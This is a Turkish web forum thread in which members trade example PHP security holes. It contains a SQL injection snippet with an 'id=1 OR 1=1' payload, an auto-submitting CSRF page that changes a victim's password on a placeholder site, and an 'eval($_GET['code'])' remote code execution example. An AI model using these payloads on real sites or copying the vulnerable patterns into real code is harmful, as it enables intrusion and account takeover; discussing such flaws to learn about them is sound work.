Herkes Bir Tane PHP Güvenlik Açığı Söylesin :) - R10.net
0
Giriş Yap
Kayıt Ol
Herkes Bir Tane PHP Güvenlik Açığı Söylesin :)
19
●
1.006
R10.net
Server-Side Programlama
PHP
Herkes Bir Tane PHP Güvenlik Açığı Söylesin :)
1
2
3
04-04-2025, 19:26:42
#1
webgiller
Güvenlik Açığı:SQL Enj.
Örnek Kod:
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $id";
Kullanım Örneği: /index.php?id=1 OR 1=1
Bu formatta herkes aklına geleni söylesin
Sunucu taraflı örneklerde verebilirsiniz kolay gelsin...
04-04-2025, 19:35:49
#2
kzlsnn
⚡Yazılım Uzmanı
Backdoor
04-04-2025, 19:35:58
#3
tekfir
CSRF token cidden çok ciddi açıktır çoğu modern uygulama ve framework koruma sağlar bunla ilgili
Edit:
<html>
<body onload="document.forms[0].submit()">
<form action="https://hedefsite.com/change-password" method="POST">
<input type="hidden" name="new_password" value="hacked123">
</form>
</body>
</html>
Bu sayfa, kullanıcı hedef siteye giriş yapmışsa (çerezleri tarayıcıda hala geçerliyse), kullanıcının şifresini saldırganın belirlediği şekilde değiştirebilir
04-04-2025, 19:36:30
#4
webgiller
kzlsnn adlı üyeden alıntı:
mesajı görüntüle
Backdoor
Biraz daha açar mısınız konunun amacına uygun olarak
04-04-2025, 19:37:01
#5
webgiller
tekfir adlı üyeden alıntı:
mesajı görüntüle
CSRF token cidden çok ciddi açıktır çoğu modern uygulama ve framework koruma sağlar bunla ilgili
Çok güzel örneklemeli bir şekilde yazabilir misiniz
yada konuyu editleyebilirsiniz teşekkürler.
04-04-2025, 19:46:22
#6
flyingatm
Yazdığınız şey MySQL ile alakalı; PHP ile değil.
Dillerde açık byte level olur.
04-04-2025, 19:47:59
#7
webgiller
flyingatm adlı üyeden alıntı:
mesajı görüntüle
Yazdığınız şey MySQL ile alakalı; PHP ile değil.
Dillerde açık byte level olur.
Lütfen konsepte uyalım, konuyu editleyip bir tane açık yazar mısınız iyi forumlar sevgiler...
04-04-2025, 19:48:47
#8
MeXe
Merhaba hocam,
En tehlikelisi ve yapılması zor olan RCE'dir.
<?php
eval($_GET['code']);
?>
04-04-2025, 19:49:55
#9
webgiller
MeXe adlı üyeden alıntı:
mesajı görüntüle
Merhaba hocam,
En tehlikelisi ve yapılması zor olan RCE'dir.
<?php
eval($_GET['code']);
?>
Tam da bunu bekliyordum PHP'için en tehlkeli kod budur gerçekten hiç kuşkusuz bütün sunucuyu darmadağan eder R10+ hak ettiniz
1
2
3
×
Beğeniler
×
Değerlendirmeler